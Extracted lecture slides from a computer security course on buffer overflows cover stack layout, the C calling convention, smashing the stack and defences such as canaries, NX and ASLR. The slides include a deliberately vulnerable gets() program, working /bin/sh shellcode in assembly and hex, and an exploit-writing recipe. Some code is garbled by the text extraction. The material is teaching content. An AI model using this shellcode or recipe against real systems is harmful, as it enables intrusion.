Topics. What is a Buffer Overflow? Buffer Overflows

Size: px

Start display at page:

Download "Topics. What is a Buffer Overflow? Buffer Overflows"

Blaise Mosley
6 years ago
Views:

1 Buffer Overflows CSC 482/582: Computer Security Slide #1 Topics 1. What is a Buffer Overflow? 2. The Most Common Implementation Flaw. 3. Process Memory Layout. 4. The Stack and C s Calling Convention. 5. Stack Overflows. 6. Shellcode. 7. Heap Overflows. 8. Defences. CSC 482/582: Computer Security Slide #2 What is a Buffer Overflow? buffer: a limited, contiguously allocated set of memory. static: char buffer[32] dynamic: malloc(), new What happens when you attempt to access an element beyond the end of the buffer? Bounds checking prevents such accesses in most languages like Python and Java. No bounds checking in C/C++ or assembly. CSC 482/582: Computer Security Slide #3 1

2 What is a Buffer Overflow? What s the mistake in this program? int main() { int array[5] = {1, 2, 3, 4, 5; printf("%d\n", array[5]); Program output: > gcc -o buffer buffer.c >./buffer CSC 482/582: Computer Security Slide #4 What is a Buffer Overflow? Writing beyond the buffer: int main() { int array[5] = {1, 2, 3, 4, 5; int i; for( i=0; i <= 255; ++i ) array[i] = 41; Program output: > gcc -o bufferw bufferw.c >./bufferw Segmentation fault (core dumped) CSC 482/582: Computer Security Slide #5 What happens when a buffer overflows? What happened to our buffer overflow? Overwrote memory beyond buffer with 41. Program crashed with Segmentation fault. Directly or indirectly accessed an unmapped page. Do overflows always produce a crash? Most of the time, yes. If we re careful, we can restrict our accesses to valid memory locations. CSC 482/582: Computer Security Slide #6 2

3 Most Common Implementation Flaw Old Bug 1988 Morris Worm (fingerd) 2003 W32/Blaster Worm (W32 DCOM RPC) Most Common Flaw 50% of CERT advisories in % of CERT advisories in 2003 CSC 482/582: Computer Security Slide #7 Why the same Mistake? C/C++ inherently unsafe. No bounds checking on arrays or pointer refs. Unsafe library functions: strcpy(), sprintf(), gets(), scanf(), etc. Perl, Python, Ruby, Java largely immune. Not checking trades security for performance. CSC 482/582: Computer Security Slide #8 Process Memory Regions Command arguments and environment Stack: generally grows downwards Heap: generally grows upwards BSS: unitialized global data Data: initialized global data Text: read-only program code CSC 482/582: Computer Security Slide #9 3

4 Process Memory Layout argv, env high mem stack heap bss data text low mem CSC 482/582: Computer Security Slide #10 Memory Layout Example / * d a t a s e g m e n t : i n i t i a l i z e d g l o b a l d a t a * / c h a r b a s e [ ] = " f o o " ; / * b s s s e g m e n t : u n i n i t i a l i z e d g l o b a l d a t a * / i n t n u m C o p i e s ; / * p r o g r a m a r g u m e n t s * / i n t m a i n ( i n t a r g c, c h a r * a r g v [ ] ) { / * s t a c k : l o c a l v a r i a b l e s a l l o c a t e d o n s t a c k * / i n t i ; c h a r * s t r i n g ; n u m C o p i e s = a t o i ( a r g v [ 1 ] ) ; / * h e a p : m a l l o c d y n a m i c a l l y a l l o c a t e s s p a c e o n h e a p * / s t r i n g = ( c h a r * ) m a l l o c ( s t r l e n ( b a s e ) * n u m C o p i e s + 1 ) ; f o r ( i = 0 ; i < n u m C o p i e s ; i + + ) s t r c a t ( s t r i n g, b a s e ) ; p r i n t f ( " % s \ n ", s t r i n g ) ; CSC 482/582: Computer Security Slide #11 Stack Overflows Easy to exploit: Security critical data: return address. Most buffer overflows are stack-based. Protective Tools non-executable stack protection in OS. Stackguarding compilers. bounds-checking compilers. CSC 482/582: Computer Security Slide #12 4

5 What is a Stack? LIFO data structure: push/pop Stack grows downwards in memory. SP points to top of stack (lowest address) %esp register is SP on x86 architecture. What s on the stack? Function parameters. Local variables. Return values. Return address (security critical.) CSC 482/582: Computer Security Slide #13 Accessing the Stack Pushing an item onto the stack. 1. Copy data to stack. 2. Decrement SP by 4. Example: pushl $12 Popping data from the stack. 1. Copy data from stack. 2. Increment SP by 4. Example: popl %eax Retrieve data without pop: movl %esp, %eax CSC 482/582: Computer Security Slide #14 What is a Stack Frame? Block of stack data for one procedure call. Frame pointer (FP) points to frame: Use offsets to find local variables. SP continually moves with push/pops. FP only moves on function call/return. Intel CPUs use %ebp register for FP. CSC 482/582: Computer Security Slide #15 5

6 C Calling Convention 1. Push all params onto stack in reverse order. Parameter #N Parameter #2 Parameter #1 2. Issues a call instruction. 1. Pushes address of next instruction (the return address) onto stack. 2. Modifies IP (%eip) to point to start of function. CSC 482/582: Computer Security Slide #16 Stack before Function Executes old stack frame Frame Pointer parameter #N parameter #1 return address Stack Pointer CSC 482/582: Computer Security Slide #17 C Calling Convention 1. Function pushes FP (%ebp) onto stack. Save FP for previous function. pushl %ebp 2. Copies SP to FP. Allows function to access params as fixed indexes from base pointer. movl %esp, %ebp 3. Reserves stack space for local vars. subl $12, %esp CSC 482/582: Computer Security Slide #18 6

7 Stack at Function Start old stack frame parameter #N parameter #1 return address old FP local vars Frame Pointer Stack Pointer CSC 482/582: Computer Security Slide #19 C Calling Convention 1. After execution, stores return value in %eax. movl $1, %eax 2. Resets stack to pre-call state. Destroys current stack frame; restores caller s frame. popl %ebp 3. Returns control back to where called from. Pops top word from stack and sets %eip to that value. ret CSC 482/582: Computer Security Slide #20 Stack after Function Return old frame return value Frame Pointer Stack Pointer CSC 482/582: Computer Security Slide #21 7

8 C Calling Convention: Registers Assume all register values destroyed. Only %ebp is guaranteed to be restored. Return value will overwrite %eax. Other registers depend on function actions. Different languages have different calling conventions: Some use registers (easier on RISC processors.) Others use a combination of registers + other storage methods. CSC 482/582: Computer Security Slide #22 Smashing the Stack void printinput() { char buffer[32]; gets(buffer); printf("%s\n", buffer); void main() { printinput(); return 0; CSC 482/582: Computer Security Slide #23 Smashing the Stack.LC0:.string "%s\n".text printinput: pushl %ebp movl %esp, %ebp subl $40, %esp subl $12, %esp leal -40(%ebp), %eax pushl %eax call gets addl $16, %esp subl $8, %esp leal -40(%ebp), %eax pushl %eax pushl $.LC0 call printf CSC 482/582: Computer Security Slide #24 addl leave ret main: pushl movl subl andl movl addl addl shrl sall subl call leave ret $16, %esp %ebp %esp, %ebp $8, %esp $-16, %esp $0, %eax $15, %eax $15, %eax $4, %eax $4, %eax %eax, %esp printinput 8

9 Smashing the Stack Run the program with normal input. > gcc ggdb o overflow overflow.c >./overflow Run the program with long input. >./overflow Segmentation fault (core dumped) CSC 482/582: Computer Security Slide #25 Smashing the Stack > gdb overflow (gdb) r Starting program: /home/jwalden/work/bof/overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x080483c0 in printinput () at overflow.c:5 5 (gdb) info registers eax 0x47 71 ecx 0x0 0 edx 0x47 71 ebx 0x6bfff esp 0xbfe97164 ebp 0x esi 0xbfe971f4 edi 0xbfe97180 eip 0x eflags 0x CSC 482/582: Computer Security Slide #26 Smashing the Stack Success! We overwrote part of the stack. Our overwritten return value was loaded into the instruction pointer (%eip). Failure! The program crashed. EIP loaded with invalid address 0x How to fix it? Insert a valid address into the buffer. CSC 482/582: Computer Security Slide #27 9

10 Controlling Execution Let s make the program an infinite loop by changing the return value to start of main(). (gdb) disassemble main Dump of assembler code for main: 0x080483c1 <main+0>: push %ebp 0x080483c2 <main+1>: mov %esp,%ebp 0x080483c4 <main+3>: call 0x804839c <printinput> 0x080483c9 <main+8>: leave 0x080483ca <main+9>: ret CSC 482/582: Computer Security Slide #28 Controlling Execution How do we input a non-ascii value? void main() { char addr[44]; int i; for( i=0; i<=40; i+=4 ) *(long *) &addr[i] = 0x080483c1; puts(addr); Does it work? (./address; cat)./overflow input1 input1 input2 input2 input3 Segmentation fault (core dumped) CSC 482/582: Computer Security Slide #29 Gaining Complete Control Use a two step process: 1. Use buffer overflow to write machine code (shellcode) onto stack. 2. Rewrite return address to point to machine code on the stack. Program will do whatever we tell it to do in those machine instructions. CSC 482/582: Computer Security Slide #30 10

11 Shellcode Why shellcode? Force a program to execve() a shell. With a shell, you can do anything. Other technique exist. CSC 482/582: Computer Security Slide #31 Shellcode Shellcode in C. int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = 0x0; execve(name[0], name, 0x0); Running the program. > gcc ggdb static o shell shellcode.c >./shell sh-3.00$ exit CSC 482/582: Computer Security Slide #32 Shellcode Shellcode in assembly: Null-terminated string /bin/sh in memory. Addresseof /bin/sh in memory followed by a null word. Copy 0xB into EAX register. Copy address of the address of the string /bin/sh into EBX register. Copy address of the string /bin/sh into ECX. Copy address of null word into EDX register. Exec the int $0x80 instruction. CSC 482/582: Computer Security Slide #33 11

12 Shellcode What if execve() fails? Program will execute garbage from stock. We ll call exit() after execve() to exit cleanly. Where will our code end up in memory? We don t know. Use relative address with JMP and CALL instructions to avoid needing absolute addresses. What if our code contains null bytes? Program will stop reading data at null. Substitute problem instructions with equivalents without null bytes, using techniques like XORing values with themselves to indirectly generate zeros. CSC 482/582: Computer Security Slide #34 Shellcode Assembly jmp 0x1f # 2 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes xorl %eax,%eax # 2 bytes movb %eax,0x7(%esi) # 3 bytes movl %eax,0xc(%esi) # 3 bytes movb $0xb,%al # 2 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes xorl %ebx,%ebx # 2 bytes movl %ebx,%eax # 2 bytes inc %eax # 1 bytes int $0x80 # 2 bytes call -0x24 # 5 bytes.string \"/bin/sh\" # 8 bytes CSC 482/582: Computer Security Slide #35 Testing the Shellcode char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\ x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\ x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; > gcc -o testsc2 testsc2.c >./testsc2 sh-3.00$ exit CSC 482/582: Computer Security Slide #36 12

13 Writing an Exploit 1. Construct shellcode to inject. 2. Find an exploitable buffer in your target application. 3. Discover location of stack pointer, so you have an idea of where your shellcode will be located. 4. Run program with your input that: 1. Injects shellcode into stack memory. 2. Overwrites return address with address of your shellcode. CSC 482/582: Computer Security Slide #37 NOP pads Determining the correct address of your shellcode is hard, even if you don t have source. What if you could have multiple target addresses? Pad buffer with NOP instructions preceding the shellcode. If function returns anywhere in that NOP pad, it will continue executing until it executes the shellcode. CSC 482/582: Computer Security Slide #38 Defending Yourself Use language with bounds checking. Use boundchecking/stackguarding compiler. Do your own bounds checking. Avoid unsafe functions (BSS, table 7-1) strcpy() gets() Use safe functions securely strncpy() strncat() CSC 482/582: Computer Security Slide #39 13

14 Safe String Libraries strlcat() and strlcpy() BSD-licensed open source routines C++ std::string library Dynamically-sized strings SafeStr library provides safestr_t objects Dynamically-sized Cast to (char *) for read-only purposes only Microsoft s strsafe.h CSC 482/582: Computer Security Slide #40 gets() / * * g e t s ( ) v e r s i o n r e a d s l i n e f r o m u s e r i n p u t u n t i l E O F o r n e w l i n e * p e r f o r m s n o b o u n d s c h e c k i n g a t a l l B S S, p */ i n t m a i n ( ) { c h a r b u f [ ] ; g e t s ( b u f ) ; /* * f g e t s ( ) v e r s i o n a c c e p t s a s i z e p a r a m e t e r ; a l w a y s s p e c i f y t h i s p a r a m e t e r */ # d e f i n e B U F S Z i n t m a i n ( ) { c h a r b u f [ B U F S Z ] ; f g e t s ( b u f, B U F S Z, s t d i n ) CSC 482/582: Computer Security Slide #41 strcpy() / * c o d e e x a m p l e s f r o m B S S, p p * / s t r c p y ( d s t, s r c ) ; / * c o p y i n g w i t h e x p l i c i t b o u n d s c h e c k i n g * / i f ( s t r l e n ( s r c ) > = d s t _ s i z e ) { / * e r r o r * / e l s e { s t r c p y ( d s t, s r c ) ; / * * o r... u s e s t r n c p y, b u t b e c a r e f u l t o a v o i d o f f -b y -o n e b u g s : * i f s t r l e n ( s r c ) = = d s t _ s i z e, d s t w i l l n o t b e n u l l - t e r m i n a t e d */ s t r n c p y ( d s t, s r c, d s t _ s i z e 1 ) ; d s t [ d s t _ s i z e 1 ] = ' \ 0 ' ; / * * o r... d y n a m i c a l l y a l l o c a t e r i g h t - s i z e d b u f f e r w h e n y o u n e e d i t */ d s t = ( c h a r * ) m a l l o c ( s t r l e n ( s r c ) + 1 ) ; s t r c p y ( d s t, s r c ) ; CSC 482/582: Computer Security Slide #42 14

15 sprintf() / * p r i n t a u s a g e m e s s a g e ( B S S, p p ) * / i n t m a i n ( i n t a r g c, c h a r * * a r g v ) { c h a r u s a g e [ ] ; s p r i n t f ( u s a g e, U S A G E : % s - f f l a g [ a r g 1 ] \ n, a r g v [ 0 ] ; / * a t t a c k c o d e * / i n t m a i n ( ) { e x e c l ( / p a t h / t o / p r o g r a m, < < b u f f e r o v e r f l o w s t r i n g > >, N U L L ) ; / * s a f e s o l u t i o n u s i n g n o n s t a n d a r d s n p r i n t f ( ) c o d e * / i n t m a i n ( i n t a r g c, c h a r * * a r g v ) { c h a r u s a g e [ ] ; c h a r f m t = U S A G E : % s - f f l a g [ a r g 1 ] \ n ; s p r i n t f ( u s a g e, , f m t, a r g v [ 0 ] ; CSC 482/582: Computer Security Slide #43 C++ Dangers Using C-style strings with cin char username[16]; cin >> username; The [] operator does not perform bounds checking Converting from C++ to C-style strings string::data() output is not NULL terminated string::c_str() ouput is NULL terminated CSC 482/582: Computer Security Slide #44 Buffer Overflow Defences Operating System Defences Non-executable stack. Randomization of memory layout. Compiler Defences Canary values. CSC 482/582: Computer Security Slide #45 15

16 Non-executable Stack Memory protection prevents exploit code from being executed. Some applications execute code on the stack/heap. x86 arch doesn t have exec bit in page tables. Segment limits can divide memory into two parts: executable and non-executable. Keep program code in low memory. Keep data and stack in high memory. Coarse-grained. NX Technology Exec bit for page tables. Added in AMD64 and newer Intel P4 processors. Only works in PAE 64-bit page table format. CSC 482/582: Computer Security Slide #46 Countering non-exec Stack The return-into-libc technique. libc contains system() and exec() functions. overwrite return address to execute system() to run /bin/sh difficult or even impossible to do in some cases. CSC 482/582: Computer Security Slide #47 Randomization Randomize layout of memory space Stack location. Shared library locations. Heap location. PIE: Position Independent Executable Default format: binary compiled to work at an address selected when program was compiled. Gcc can compile binaries to be freely relocatable throughout address space. gcc flags: -fpie pie Program loaded at different address for each invocation. CSC 482/582: Computer Security Slide #48 16

17 Stackguard Compiler extension for gcc code must be compiled w/ Stackguard Detects altered return address before function returns adds canary word to stack must overwrite canary to change return addr use random canary words for each function to avoid guessing attacks CSC 482/582: Computer Security Slide #49 Stackguard Stack Layout old frame param1 param2 old PC canary word old FP local vars Frame Pointer Stack Pointer CSC 482/582: Computer Security Slide #50 Stackguard Effectiveness Code Dependencies are dynamic libraries stackguarded? Compatibility Recompiled entire RedHat 7.3 distribution Small performance Cost canary insert and check overhead on each call Protects against future stack attacks CSC 482/582: Computer Security Slide #51 17

18 Key Points Buffer overflow attacks. Buffers and overflows Stack layout and return addresses Smashing the stack. Shellcode. Defending against buffer overflows. Use a language with bounds checking. Check your own bounds in C/C++. Avoid unsafe functions in C/C++. Use compiler/os stack defence techniques. CSC 482/582: Computer Security Slide #52 References 1. Aleph Null, Smashing the Stack for Fun and Profit, Phrack 49, Bartlett, Johnathan, Programming from the Ground Up, Bartlett Publishing, Bishop, Matt, Introduction to Computer Security, Addison-Wesley, Conover, Matt & w00w00 Security Team, w00w00 on Heap Overflows, 5. Graff, Mark and van Wyk, Kenneth, Secure Coding: Principles & Practices, O Reilly, Horizon, Bypassing Non-executable Stack Protection on Solaris, 7. Hoglund, Greg and McGraw, Gary, Exploiting Software: How to Break Code, Addison-Wesley, Howard, Michael and LeBlanc, David, Writing Secure Code, 2 nd edition, Microsoft Press, Koziol, et. al, The Shellcoder s Handbook: Discovering and Exploiting Security Holes, Wiley, Viega, John, and McGraw, Gary, Building Secure Software, Addison-Wesley, Wheeler, David, Secure Programming for UNIX and Linux HOWTO, HOWTO/index.html, CSC 482/582: Computer Security Slide #53 18

Buffer Overflows. CSC 482/582: Computer Security Slide #1

Buffer Overflows. CSC 482/582: Computer Security Slide #1 Buffer Overflows CSC 482/582: Computer Security Slide #1 Topics 1. What is a Buffer Overflow? 2. The Most Common Implementation Flaw. 3. Process Memory Layout. 4. The Stack and C s Calling Convention.